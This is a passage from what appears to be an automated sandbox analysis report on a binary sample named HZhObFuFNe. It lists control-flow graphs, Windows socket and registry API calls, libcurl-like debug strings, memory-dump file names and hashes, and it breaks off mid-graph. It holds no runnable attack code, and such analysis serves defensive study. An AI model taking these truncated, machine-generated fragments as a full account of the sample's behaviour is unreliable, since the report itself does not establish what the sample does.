c3d090 call c64fd0 1425->1432 1433 c58e28-c58e2c 1425->1433 1426->1371 1430->1431 1440 c58c5a-c58c62 1430->1440 1436 c58c99-c58c9f 1431->1436 1437 c58dc8-c58dd9 call c5b100 1431->1437 1432->1424 1433->1424 1433->1432 1436->1387 1437->1398 1444 c58c64-c58c68 1440->1444 1445 c58c6a-c58c70 1440->1445 1443->1371 1449 c58d7a-c58d81 1443->1449 1444->1431 1444->1445 1445->1431 1446 c58c72-c58c8b call c650a0 1445->1446 1446->1431 1449->1371 1453 c58d87-c58d8f 1449->1453 1457 c58d91-c58d95 1453->1457 1458 c58d9b-c58da1 1453->1458 1457->1371 1457->1458 1458->1371 1459 c58da7 1458->1459 1459->1426
                                                            APIs
                                                            • connect.WS2_32(?,?,00000001), ref: 00C58C2F
                                                            • SleepEx.KERNELBASE(00000000,00000000), ref: 00C58CF3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            • Associated: 00000000.00000002.1497112310.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497761383.0000000001366000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001368000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001604000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.000000000160C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498084907.00000000016F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498207505.00000000018AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498224168.00000000018B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: Sleepconnect
                                                            • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                            • API String ID: 238548546-879669977
                                                            • Opcode ID: 1b7a34b3b8ec0714dc0c0b54e82508e5b88729cbbfc603261268c6c34aef2cb1
                                                            • Instruction ID: 22d8d0aa45e005b8e925a24b3193b93d6c820bbcfefef480457b24e6eaef6b92
                                                            • Opcode Fuzzy Hash: 1b7a34b3b8ec0714dc0c0b54e82508e5b88729cbbfc603261268c6c34aef2cb1
                                                            • Instruction Fuzzy Hash: 09B1DF78604706AFE710CF24CC85BA6B7E4AF45315F14892CEC696B2D2DB70E98CCB65
                                                            Function 00C22F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1460 c22f17-c22f8c call 10a0df0 call 10a11e0 1465 c231c9-c231cd 1460->1465 1466 c231d3-c231d6 1465->1466 1467 c22f91-c22ff4 call c21619 RegOpenKeyExA 1465->1467 1470 c231c5 1467->1470 1471 c22ffa-c2300b 1467->1471 1470->1465 1472 c2315c-c231ac RegEnumKeyExA 1471->1472 1473 c231b2-c231c2 1472->1473 1474 c23010-c23083 call c21619 RegOpenKeyExA 1472->1474 1473->1470 1478 c23089-c230d4 RegQueryValueExA 1474->1478 1479 c2314e-c23152 1474->1479 1480 c230d6-c23137 call 10a10c0 call 10a1150 call 10a11e0 call 10a0ff0 call 10a11e0 call 109f560 1478->1480 1481 c2313b-c2314b RegCloseKey 1478->1481 1479->1472 1480->1481 1481->1479
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            • Associated: 00000000.00000002.1497112310.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497761383.0000000001366000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001368000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001604000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.000000000160C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498084907.00000000016F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498207505.00000000018AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498224168.00000000018B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: EnumOpen
                                                            • String ID: d
                                                            • API String ID: 3231578192-2564639436
                                                            • Opcode ID: 42a96cde9c1bfc4d62c2d4384ec1838a74fb74ff1e6720d69cb9570a0baa13bd
                                                            • Instruction ID: c53900a681b45a4724db96496d566361be674b6404fcb044c785b7e4bd569f86
                                                            • Opcode Fuzzy Hash: 42a96cde9c1bfc4d62c2d4384ec1838a74fb74ff1e6720d69cb9570a0baa13bd
                                                            • Instruction Fuzzy Hash: 9771A3B490431A9FDB50DFA9D58479EBBF0FF84308F00895DE89897345D7749A888F92
                                                            Function 00C59290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1494 c59290-c592ed call c276a0 1497 c593c3-c593ce 1494->1497 1498 c592f3-c592fb 1494->1498 1505 c593e5-c59427 call c3d090 call c64f40 1497->1505 1506 c593d0-c593e1 1497->1506 1499 c59301-c59333 call c3d8c0 call c3d9a0 1498->1499 1500 c593aa-c593af 1498->1500 1518 c59335-c59364 WSAIoctl 1499->1518 1519 c593a7 1499->1519 1503 c593b5-c593bc 1500->1503 1504 c59456-c59470 1500->1504 1508 c593be 1503->1508 1509 c59429-c59431 1503->1509 1505->1504 1505->1509 1506->1503 1510 c593e3 1506->1510 1508->1504 1513 c59433-c59437 1509->1513 1514 c59439-c5943f 1509->1514 1510->1504 1513->1504 1513->1514 1514->1504 1517 c59441-c59453 call c650a0 1514->1517 1517->1504 1522 c59366-c5936f 1518->1522 1523 c5939b-c593a4 1518->1523 1519->1500 1522->1523 1526 c59371-c59390 setsockopt 1522->1526 1523->1519 1526->1523 1527 c59392-c59395 1526->1527 1527->1523
                                                            APIs
                                                            • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00C5935C
                                                            • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00C59389
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            • Associated: 00000000.00000002.1497112310.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497761383.0000000001366000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001368000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001604000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.000000000160C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498084907.00000000016F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498207505.00000000018AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498224168.00000000018B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: Ioctlsetsockopt
                                                            • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                            • API String ID: 1903391676-2691795271
                                                            • Opcode ID: 457fc987c13805a50e2e52c60b1a4954ff1039a94b33133ad877d11d1de87fd4
                                                            • Instruction ID: a418c3e75130cb5e94e9e6e5659935ac8c5d1cd9eda2f9cb56c0f1e536f710ec
                                                            • Opcode Fuzzy Hash: 457fc987c13805a50e2e52c60b1a4954ff1039a94b33133ad877d11d1de87fd4
                                                            • Instruction Fuzzy Hash: 4A510274600305EFEB10DF24C881FAAB7A5FF88314F148568FD589B292E730EA95CB91
                                                            Function 00C276A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 73networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1528 c276a0-c276be 1529 c276c0-c276c7 1528->1529 1530 c276e6-c276f2 send 1528->1530 1529->1530 1531 c276c9-c276d1 1529->1531 1532 c276f4-c27709 call c272a0 1530->1532 1533 c2775e-c27762 1530->1533 1534 c276d3-c276e4 1531->1534 1535 c2770b-c27759 call c272a0 call c2cb20 call fa8c50 1531->1535 1532->1533 1534->1532 1535->1533
                                                            APIs
                                                            • send.WS2_32(multi.c,?,?,?,00C23D4E,00000000,?,?,00C307BF), ref: 00C276EB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            • Associated: 00000000.00000002.1497112310.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497761383.0000000001366000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001368000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001604000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.000000000160C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498084907.00000000016F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498207505.00000000018AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498224168.00000000018B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: send
                                                            • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                            • API String ID: 2809346765-3388739168
                                                            • Opcode ID: 54e78a950ef243c7faa5c8546259ff8e6302277a1180d7ac537c33738bc87f4d
                                                            • Instruction ID: fb075ac4c12bb61d23a7df0534e88c6a117e0511974e816bcaf6422c5e67d9a1
                                                            • Opcode Fuzzy Hash: 54e78a950ef243c7faa5c8546259ff8e6302277a1180d7ac537c33738bc87f4d
                                                            • Instruction Fuzzy Hash: F511C4F5A293247BD6219A16ACCAE2B3B5CDBC2F68F450B09BC0917243E5619D41C6B2
                                                            Function 00C27770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1647 c27770-c2778e 1648 c27790-c27797 1647->1648 1649 c277b6-c277c2 recv 1647->1649 1648->1649 1650 c27799-c277a1 1648->1650 1651 c277c4-c277d9 call c272a0 1649->1651 1652 c2782e-c27832 1649->1652 1653 c277a3-c277b4 1650->1653 1654 c277db-c27829 call c272a0 call c2cb20 call fa8c50 1650->1654 1651->1652 1653->1651 1654->1652
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            • Associated: 00000000.00000002.1497112310.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497761383.0000000001366000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001368000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001604000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.000000000160C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498084907.00000000016F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498207505.00000000018AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498224168.00000000018B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: recv
                                                            • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                            • API String ID: 1507349165-640788491
                                                            • Opcode ID: 4e75e6f5724c17e1542a4610a2b2d73f9a3485efc640606062a921aa6a739bae
                                                            • Instruction ID: f095ab00c13aadd4243f356b8e1b411b521c413fc061d9931fa1e6eb53c0df7d
                                                            • Opcode Fuzzy Hash: 4e75e6f5724c17e1542a4610a2b2d73f9a3485efc640606062a921aa6a739bae
                                                            • Instruction Fuzzy Hash: 451127F5A183647BE6219A11FC8AE273B9CDB86F68F050B1CBC0923343D2619C00C6B2
                                                            Function 00C275E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1666 c275e0-c275ed 1667 c27607-c27629 socket 1666->1667 1668 c275ef-c275f6 1666->1668 1669 c2762b-c2763c call c272a0 1667->1669 1670 c2763f-c27642 1667->1670 1668->1667 1671 c275f8-c275ff 1668->1671 1669->1670 1673 c27643-c27699 call c272a0 call c2cb20 call fa8c50 1671->1673 1674 c27601-c27602 1671->1674 1674->1667
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            • Associated: 00000000.00000002.1497112310.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497761383.0000000001366000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001368000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001604000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.000000000160C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498084907.00000000016F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498207505.00000000018AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498224168.00000000018B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: socket
                                                            • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                            • API String ID: 98920635-842387772
                                                            • Opcode ID: dc9a6198a4048ec99562b05b7f9c10b4d26ed79c8004d946ba744568928bad8d
                                                            • Instruction ID: 7c94f00f230c553c73d37d853b17efe7685c5fa97a2d22aecd448fe23dacc4a0
                                                            • Opcode Fuzzy Hash: dc9a6198a4048ec99562b05b7f9c10b4d26ed79c8004d946ba744568928bad8d
                                                            • Instruction Fuzzy Hash: 24118CB2A5032177DF216669BC9AF8B3B8CDF82B78F040B14F82853283D2218C91C3D1
                                                            Function 00C5A150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1775 c5a150-c5a159 1776 c5a250 1775->1776 1777 c5a15f-c5a17b 1775->1777 1778 c5a181-c5a1ce getsockname 1777->1778 1779 c5a249-c5a24f 1777->1779 1780 c5a1f7-c5a214 call c5ef30 1778->1780 1781 c5a1d0-c5a1f5 call c3d090 1778->1781 1779->1776 1780->1779 1786 c5a216-c5a23b call c3d090 1780->1786 1788 c5a240-c5a246 call c64f40 1781->1788 1786->1788 1788->1779
                                                            APIs
                                                            • getsockname.WS2_32(?,?,00000080), ref: 00C5A1C7
                                                            Strings
                                                            • getsockname() failed with errno %d: %s, xrefs: 00C5A1F0
                                                            • ssloc inet_ntop() failed with errno %d: %s, xrefs: 00C5A23B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            • Associated: 00000000.00000002.1497112310.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497761383.0000000001366000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001368000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001604000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.000000000160C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498084907.00000000016F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498207505.00000000018AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498224168.00000000018B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: getsockname
                                                            • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                            • API String ID: 3358416759-2605427207
                                                            • Opcode ID: 9d3121a31ed22f8a9de007a81454dbfc04a6d09bfae081e821753815871d8fd3
                                                            • Instruction ID: 0f7bf13ed3bb48bdcc0de06c9e23ef4096dec339729a65e0d532377f6d474d68
                                                            • Opcode Fuzzy Hash: 9d3121a31ed22f8a9de007a81454dbfc04a6d09bfae081e821753815871d8fd3
                                                            • Instruction Fuzzy Hash: 5921F871818680AAE7259B19EC47FE773ACEF91324F000614FD9853051FB326A8987E6
                                                            Function 00C3D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1795 c3d5e0-c3d5ee 1796 c3d652-c3d662 WSAStartup 1795->1796 1797 c3d5f0-c3d604 call c3d690 1795->1797 1798 c3d670-c3d676 1796->1798 1799 c3d664-c3d66f 1796->1799 1803 c3d606-c3d614 1797->1803 1804 c3d61b-c3d651 call c47620 1797->1804 1798->1797 1801 c3d67c-c3d68d 1798->1801 1803->1804 1809 c3d616 1803->1809 1809->1804
                                                            APIs
                                                            • WSAStartup.WS2_32(00000202), ref: 00C3D65B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            • Associated: 00000000.00000002.1497112310.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497761383.0000000001366000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001368000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001604000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.000000000160C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498084907.00000000016F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498207505.00000000018AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498224168.00000000018B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: Startup
                                                            • String ID: if_nametoindex$iphlpapi.dll
                                                            • API String ID: 724789610-3097795196
                                                            • Opcode ID: c155260e546116b7569fe9e99a29194fde8c037f06f550a9db8beba201f6a550
                                                            • Instruction ID: 51678d65bfe6dd6a6ab194a0aa3c65978549cf68021aa8f269929b23d15dd35c
                                                            • Opcode Fuzzy Hash: c155260e546116b7569fe9e99a29194fde8c037f06f550a9db8beba201f6a550
                                                            • Instruction Fuzzy Hash: 5B0176D096034042F7227B38A81B36621A46B51704F850D6CEC69831C3F728C698C3D3
                                                            Function 00CEAA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1811 ceaa30-ceaa64 1813 ceaa6a-ceaaa7 call cde730 1811->1813 1814 ceab04-ceab09 1811->1814 1818 ceab0e-ceab13 1813->1818 1819 ceaaa9-ceaabd 1813->1819 1815 ceae80-ceae89 1814->1815 1822 ceae2e 1818->1822 1820 ceaabf-ceaac7 1819->1820 1821 ceab18-ceab50 1819->1821 1820->1822 1823 ceaacd-ceab02 1820->1823 1828 ceab58-ceab6d 1821->1828 1824 ceae30-ceae4a call cdea60 call cdebf0 1822->1824 1823->1828 1836 ceae4c-ceae57 1824->1836 1837 ceae75-ceae7d 1824->1837 1830 ceab6f-ceab73 1828->1830 1831 ceab96-ceabab socket 1828->1831 1830->1831 1835 ceab75-ceab8f 1830->1835 1831->1822 1834 ceabb1-ceabc5 1831->1834 1838 ceabc7-ceabca 1834->1838 1839 ceabd0-ceabed ioctlsocket 1834->1839 1835->1834 1852 ceab91 1835->1852 1840 ceae6e-ceae6f 1836->1840 1841 ceae59-ceae5e 1836->1841 1837->1815 1838->1839 1842 cead2e-cead39 1838->1842 1843 ceabef-ceac0a 1839->1843 1844 ceac10-ceac14 1839->1844 1840->1837 1841->1840 1848 ceae60-ceae6c 1841->1848 1846 cead3b-cead4c 1842->1846 1847 cead52-cead56 1842->1847 1843->1844 1854 ceae29 1843->1854 1849 ceac16-ceac31 1844->1849 1850 ceac37-ceac41 1844->1850 1846->1847 1846->1854 1853 cead5c-cead6b 1847->1853 1847->1854 1848->1837 1849->1850 1849->1854 1856 ceac7a-ceac7e 1850->1856 1857 ceac43-ceac46 1850->1857 1852->1822 1861 cead70-cead78 1853->1861 1854->1822 1859 ceace7-cead03 1856->1859 1860 ceac80-ceac9b 1856->1860 1864 ceac4c-ceac51 1857->1864 1865 cead04-cead08 1857->1865 1859->1865 1860->1859 1866 ceac9d-ceacc1 1860->1866 1867 